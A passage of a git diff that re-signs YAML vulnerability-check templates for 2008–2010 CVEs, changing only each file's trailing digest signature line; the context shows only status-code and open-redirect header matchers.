of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 73acdbff09..8dac39b9a9 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202e71e72ad3fdac21334fe3446a010663732faf568f4cd57a92e4431876405baf0221008c31cba704c52d8afc84886b6090d5740ea6d8f65d2ec9a8e592dd5f3e857ad4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d7d299017424e2049991bfe32fdc3f66f819de433cf4a7fafd88be40a8cf5bd4022006b62bd407a018bf0eb1b8e64c44aa8496cfbd6bdf512a183a1113cd98f56455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 14a7d6c0c5..5f4bf614af 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ae68958325c13a5a1a18aaf4b9cedbba5168d0e5c98e3e0195edba55dedea18f022100af95d530c98d093fc628bbd3e8fe36d87d2b479c1e1b53debb846a3c25772665:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202e5b69b2ac267f882e9adc776eb41b70e07b722ed988fc5dc1f26dd9d0052391022034fbfa23e6eef6082f057ac923e8b31ff48fa6f46ea322164677dbba789e0a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 3112611597..6befdf9eef 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 500 - -# digest: 490a0046304402201a6c1a0662176a06cb31ef97a6e9fea2e12b9f3a0e8d12f6c1f910ebfa94452a022064df13ea2f89ce8064d0d525bf48a749821563906e6e3f25e5043402e4ca48c6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204b44b8ca195f9a8bb197c150d0a2191096831ffd5caa2d6931bcdfc03a24d92502201f64705581283da93992165cc9106158e5b090dc3a5dc0eb5443d475a8a26650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index aa5093372f..757c707a50 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a0046304402203a40ff8c9ef91b0d67d19e5db5f1d401e809e75ff9c1c856bb34738f3a80011a022027c0b511bfb3b7fa435d4fa9a2dd58539ebe2a1f85fa25cf03aae378842476f1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205817a149e40c9cc0c660f0e162d002c6e657759ee47bd91ab8278011c756b09f022100994fb61938e856999b11a45955436b1dab0a852f6f791b5b756d88883b883d02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 0b469398f1..e4dd284ac3 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4b0a00483046022100a4fb3f1f26e87549a0346537c99aac620c444f3b5891bab7a6d3afe485bc1275022100bf9e4887170099ded1d09e00598d4198eeeac39adfd93f6b4062a183ddedbdff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f0ae4732d3b461a96aee40cf09a6c91844aa61629fe6cf4d3baf0599a4b43ef1022026efb79ae73aafe70c01a99514db235a4e580e4812e1caa33b6711dfb5341eca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 4ee81118a3..018b855126 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220225a9977f6b3e43a446ba93183260d3404da98d0a3878ea6c984139db365f7a4022100ce71f2c95520ba95aea00c91c30c3eac42d6c35246ea86046addf7c92633e27f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fe67719d8882634bc5af2be7e3be0d98c87a14979460e8af5dd7e52f0ac63920022007fd746ce77044bee4f624cdd0d2e869faccf792626974d9efda0dcf324dfae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 1a428fd37a..9825daa0ae 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022061e0d5d5d476e3caddd1ff1433f46857a3e6f6534d6ec8183d05bf973bcda1420220431b4b1e4c02a02bdbdce462d95243196d8f8d9b014121cc01cdf31aa8ff527d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c41e48d7150d0fe6afda7b3b019589e32445437a21e9f32dfc2fd79d564267c6022100bc5dd7c0f1f2da6def7c587fb635b07a5a810dd1ca94b000ed72e354d2bcb77c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 70a07b000a..8df86f598e 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220116ddc6dc44d74cacfd1a85fca5c629659ac61d56e9092a5c0c95cbd780944cf022100d422d6f87a3a9ac8b3012ccfd46d0cf59d3f1d13d74d63e4a69b0394ad07e8a3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de5f3ba0f0b9a7fb6d0c4e6eaee87074357dfc34ca4eab5681b01db31776f014022100b293db3a0aeeffe417a987866ef3747ad4ece769c3cab1d0dd523a4279495ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 1b0de985f6..71e8217dee 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a9144e6064c3c0954996f644ca3d79a62be6d1558dc8074fc813307aba7590ec02202b3e1a95822a1bc10eec518594142d99021fe987b4d1a8d40d6ec277a6f18f06:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022023e841a87440ee2ee0356943e94d865f220a21e092d220157665dc1f1ffd601a022100be694d13e35a6e106d9580c33b49a75ea14e65ea623119d9cf23b9624810fa70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index d01216792d..d7ac14ed18 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e0f9e4d3979cf7fb4b85cf75f1c808ecb6db2645bc01ba179b9822216a5f82b30220661d94ff3c1e3baf962c4811c2ecb0295af00ec92c24a3ff5f36bc6792ba504b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f1072b2adcc77a536f9a98869f51183d2615f943cea206d0bfa6545e5d407316022042a4ce88bac1c9baa088563819e3f4dafeb97cbe31f385c0a570a3a3edc911ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 1bc1fe8bdb..467b64663f 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b86c09c2fc23a9a8a723d957775f912cb1c1f00d3ac2d6990ca66ac3d636f2250221008b1edbd72157e245660129250d11e4706d2cc56cf7e067c1756a966c1168a712:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bff99809efc917902f6837c5ce55d324c25d45d08cf9d6604e9abaa4867da041022100fd7ea40b5025d0dd2218d8deae5dd83bbc8be2e3321749a9a7d486e543fc8c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index cb81070282..ef753b7237 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a8530668ba1327d37fac6302e61fa31f8bed06f77b1e187c4c7d7291946bd1dc022100925490352b66a55d09fb5823343504d05ffccd4f39cf129ea66c9b52d49c8788:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204084caf300047c1fc6f678047038162fa8420846e23cbca84112156ad80b4637022100aa6ef07475f3da84e0581c5d5a7a5f69582b383a6a39ac32d0bb4ab89fe3a298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 4f0ea80d8e..d06ea93235 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008253458574a558f0048881e209c8724637f135a2e08f06ecb4adcf13c6af7715022100db109ce80163c82ecc9cfcb8cd495117b50b58ef1637505efe2dfec6d47a33ca:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206cac48fa50cf18b48e466b4694a95e285e0f8f0f72f9a4620e8376015253ef82022021fe6163c168e76a3a21f0943258e6e090d9eb6cf3aedc61f32f615fdfafbd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 4710f32d3d..7be7e7fa00 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201ca85ce6475c6107d30edcb8e32c59683579966f42caf7a8feb419f2922c4a83022057b9daf1adda48f534a763b50a76690e503373e00074ab39fa3cca42c5f493f4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206156c67a0d19473b15461d0b062d3683c211b1b2a1ae39d0b01ba214c0159e8a02203deb12aeef49bd5dd249d543fe9e4b03bcfe9d353fb1c81d868e8541f26ce1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index c07df35388..8c501ea9f4 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022004806a9823f876b60c36ac9cc3f38e6c90c6177ad315247e727d8ea3ea4f435902200c01475406412e5f29d50a5914ad51987135074c1244220115dba20757368e86:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038b401aac27ef1cff6a802b1a51edf850de5c97f3697ce0570da31810f8850a3022058124fe64684901f482816e488a62fcf783dd780730043c871ca40592eb9f46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 2c50180913..f6bfc74a64 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c6d560ec94c429eec67cf5686febc2a284a1f5bbf0ba5acf4ba43c9ad4ea05d9022100f549d00f532208f52cec5b07f4277e446cfbb479095420ef3bb1e84e39e6c818:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022008b83eacddd2c4a8d234bb35ff95c90250c58cc90bd37d6bd0d1de6e96e1ab90022100f5fb44935ec9a8891d2b81ad9a8145217b039ed7d449204b7623127aad7b6f2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 0da791d836..66b9a19b07 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210096ef00365de861dbef0c297ffd309b5b5e26b1869ab8492c57e4c0a93e4d992002205a8aa3b92229d58aeaa63dad525393a423519785f65ec704491afa63af378f9d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b47d3c8a565093581d253dddb46f5d91bc5f2ea1b933e90e10f023b71dd1c3f3022040127e823a2857f295beaab5d0d7d65d74a232318461cdfcfc1dccee1146fc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 1320265647..3408515efd 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a0047304502203c00dba8096aaf3da35c70c90b6bd1af8c32bb94f34730c62a77a196900452e6022100f60897b4f53189a05212312d0a50a373cf4eb8cae8dec0f6c58476ba0c657d29:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022078b51ce01a5dedcec6afe231d09b3aab2e8a4332596128e0403b8d2572e852ac02203673b9a193329adaacc36aed01021660254cc0c389e3a71ee2e52d980295e6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index d78dab08f2..865c842d62 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f6f21c323951728453163016377f95e63215d9a69e7e83beaad91d3180c84602022002842dcd05e308b023484e5f9dfef94bcae8157991aab81687999212c763c56c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205cb97a04cd0a6d21ac0ea44a2e7146eab292492df4a235c9808b4bfa9a04b31b022100dad7ed6153630fb4a356093c9d7ecff201d0df49602c7bfa35661e8203a58199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 3a7d7101eb..ab908ce4cd 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022023a37ad7022fb3ea4680961c03fbd4698e0c1a31c55a3b96cf3d666e05be805d022029378a8235dad0cba7857df5bc6c4329d99a1c4ab6c3262bbd206a7e70bc0590:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022013b5de5f023730b90a55ce2c90cc2d48dcf9966f7ca4064fc87e9139c17427f2022051c4b3b831f79e2869e4ba64655a80fc2b0aa3f26dcdb70810615e43aab4bcf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index db22560e6c..662341d1c6 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ee66a81cf0b38e51042293f4a1dddc8aa8dba47774371e9d19eb48829eea21f80220368383c23f0e6b0c8f3c52120ae93ac76e1e4c2e52c9bdeb83814ca2c54f6ead:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008f4bad01c33bd0abc7a040d1f2873216d00a465439ba1eacafc0f9afc1e14379022035ff2091b7ca247d5df65db41584f094ab86acb4172116371ab0a3aae5c26947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index c3f439296a..fc147ad51f 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203f4b902ebc2ae4854cafeb88509c7e1ef5cfec9ecd2e63ebe5919272bbba62e9022100cbd8ec589f383690d4813601af98da2fac45af5428344a064d422f86af5bbd14:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018073b3206c3b2c968e68ae7d2275e7079f4d94473f5813775679be51203a027022028bdc50fce758a1fe15e3198ea463b370b323bcb7ad5fef5c089dd54c4d3127b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 0ffe163961..90fc80e436 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200c1daefd45441a6775d47dec8176af125290fe9a2f506ab0621f0c35706039400221009d91b31c866a277402a6ad484789eaf3a7022d4952f74eec830b2f69172bd52c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cfabf3d51eb3fc27eab663bac0083491fe32b86660138ed70f87436b7b7b0f25022006ff13a9638ed46ee97260a2fa830c7c7733777a05135e0b0135f09e1a6eea4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 1c9fe84680..55b9d7d8ad 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c94f1338a2dff721cd063eed5485dbd9a3c66e36446450c1541be48488735e67022100cfe98b345c2bc3ee84c7d92554e2a58b36b684dbb2cac8969dc88cc27aae419c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca7b79abcc8f31a29ea46bfa597e3c420cced2b2d6bd336b058c1bcb8b8f12f202205957873e16254e096482c58cf52914456a6fab7a8c9b2880c2e78e88f5ad38cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 6d8282af36..c467777256 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fd91e7dfebaf8b0d04852883f5e7a633abe8aa06faf8657fc073c775bf374793022100eec148400ff02e7f6ee994882a3dd373828cfb8829619e4b0d6bbe6cf7da9700:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d028d10b311f7bb837d4a34740abd28ebaadbff8946ed559109dd738886ec94e022045b634f277a943e1af0f35b5ca72565afb5569bd5faf28268d1cb41932f1c540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index d2e414c18e..a33a89f558 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b2fbff89c230538358bba6fc5afce9ccaadbdcedecb8c45a8db76bf6608e4233022100ddd21f7c769f48c04d307662bf41b6807f181234eb54b3b00793a2ce62d42ed2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100db213b00ee4d95fd9c580547fab71f008a21b9f9a04ac84b3151ca48c866d37102205d4e001df3dc7b9df183e21a9221ab08939285c05fb8605079c7d915c442547f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 0d165a5d4a..88dc4081f6 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d29a9ce567c0aa89e4daf7800b6316e60a0ff2c4e507227be2af830d8112afc2022100d6c9853f4dbb770b4070acb020a365994e45cc635a87d504097726d997a247bd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008621302bfc5498ca7a0e195a8996031f15e2e82877e7daf31ad7d5fb51f20b300220305f9588e1d02343d4e9a14cb9f4748fa92503c6d670c9afc9a3ac54d0c354d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index e7346d49c1..f093a034fb 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dff33c9033e1b94bddb8a8e6127e74c5bbcc96102afffa1908892bc7f2bcd6f4022100ae3cbc19e4b253fd7672c7a3c01b9fe9cdaa37134e7dde2fec130662b7e2bd2e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100acbc4cbe309b49cdc4ccf38e2100e675e674073cd1c1ebed35a6bf11a3bad9c40220746d728b6a0675abbc1708dab41e67c6c3ea3b035d536c7b9eec83785e2d5ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 3f1b288c7e..a3eee803e2 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009988b72c18a8473e7676505c8dbcf940f19b037a7cda5e342166cc62998f53e1022051670d3d925f03da83afeaaed9aabe505861204af60117def2f35c5439289582:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a30ac58560d958ea75eff1d01d0e50dbe622c5aab1bc70cefca8880f9ab8aa9f02203b110252523925fcc4658814fba38ee213ff3b246bb31bae7fac601a0eae4bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 21223a826b..0440659fd4 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d74dd5d68f3e54422255ecc05d88f31d61bc710bb6170eadbf7b16334afd6fb10221008e91799ca473f0698e062ca2ead6939ccf62f9ce998034ba4a6ea3348a99bd48:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203b9605435a8afe7abbd0c043403ce4c178a713354a74b688e02676b879b75965022001a7bfae19e5b3ed1739ba8d33db791fcac2d55480938b3d5d61fe2a01ee09ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 26dfa75d81..f7d8aeeade 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d25c1566a9de53c8293cece2cf57afbe02e1459d3447a96f68be6fd7eb0a9c6b02207f7597f4df7414385e5c59f1ef313f956da70de3e83a29613fc4e73511bd7038:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022066d5d5c7849db99b6f47467d111d3a37930b08ef1f907f48c9449d1f8814602f022053bf34dd55442f4b0f358965762605b760cd12b922328b11c46cf83ed6ae3a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 918fde6fec..00c79ddd10 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210087b176606c85de1ae890e412cdbc5271199eed07cd7535a2178cf217b31ec8ba02203199b9303e8ee29fa4dc1b2ad01faee7f17fe727c22cd16745a8591bde952e1d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022031e4522af0758fc58a5c957bfbc4bf2b979466a6f6e223de5fa3696b6ac4bdc2022066a1d64e6ceab506525060896bb3fe1175ed003659e4a04abbbf63b23aea66e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index dc362698d2..9df38598f9 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f95d7c437b7a17ad3f3b4a0323b1a636be740478fde30d38e8a63f6bc185305a022059e61ec7c8c98c505beee18607d635debdc62d82b6c05ff1a1c16eb85fe1cf89:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206181869e2b20dd8ee00e1fcca1add114da953caa2477e7dd1aec4a2fccf90ce6022063e81d7f2e0afd10a34ad341e1134f822160af3377c1797b0d1512d5e4ea588e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index d604dd3222..939660420d 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f02f199bb61e17ea003fbcfca82494b36e0b63c97ca85a31050cc24a6d6e39c3022100b9ac5ad8287cfcc76ddc15f97dc1eb2eb87c889c541567a8d19afcae5c063012:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201d15ef33962821ce946de83951126b6358abba9577194645f7b2c99891a527a8022100b847d7fe7ad7991fdbc44d8732dcecd2c131feefa97fc070e38d8d42114c8b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 1f4ff11856..6a1d96cef5 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e0b33fff97fb0ae5caf281801eeb3f083e35fa9f7a0c7514e10ed3ccaf4156dd022055264150d8f052b1c17820f2a6a196b0ca422bd271ca74a4b82c30089fb2eb87:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100940037c124bf13df81bd7e61200ac7e09a25eb0ffe2218474ea6fd69fabcab3b0221009df54ceb755f30f3b22a1bd747657be0c9a572aaab4930b1a1bbe362e414e4be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index bf8bd677d3..30c86bd8b2 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cd263b378665fe459c9ac4c3593b1ffea45c13747bde6bdc9fbe540e479275c002206b952cfef1e1f5c9a197e9975372db932018585bb6d53a4dd6e83a0b9b88552e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de0202d51eda604e9880a6ec64a5ec824d4781d9174950eff3a10b8de93f7211022100b60503f10a038203087db337e4a0019b3322919094eabb947dd18ea0bfb49939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 90d5b6ce02..7a73e95326 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022034dee82663578c2e1ab9a960772cf617aca31c767509694d09dde8e09549e300022100bf2f07e28729557a5cd345206844273182673d9efd30968fa1e122af6115b3f2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fca4f999abca2ae892c46e65c35a91e0bd841d55424e21d2d10abd201d6585a5022100cdfdc75f572ba8a2994d35ab0ac8155bb3d56c29aa682b80f01bc2665a71bf5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml 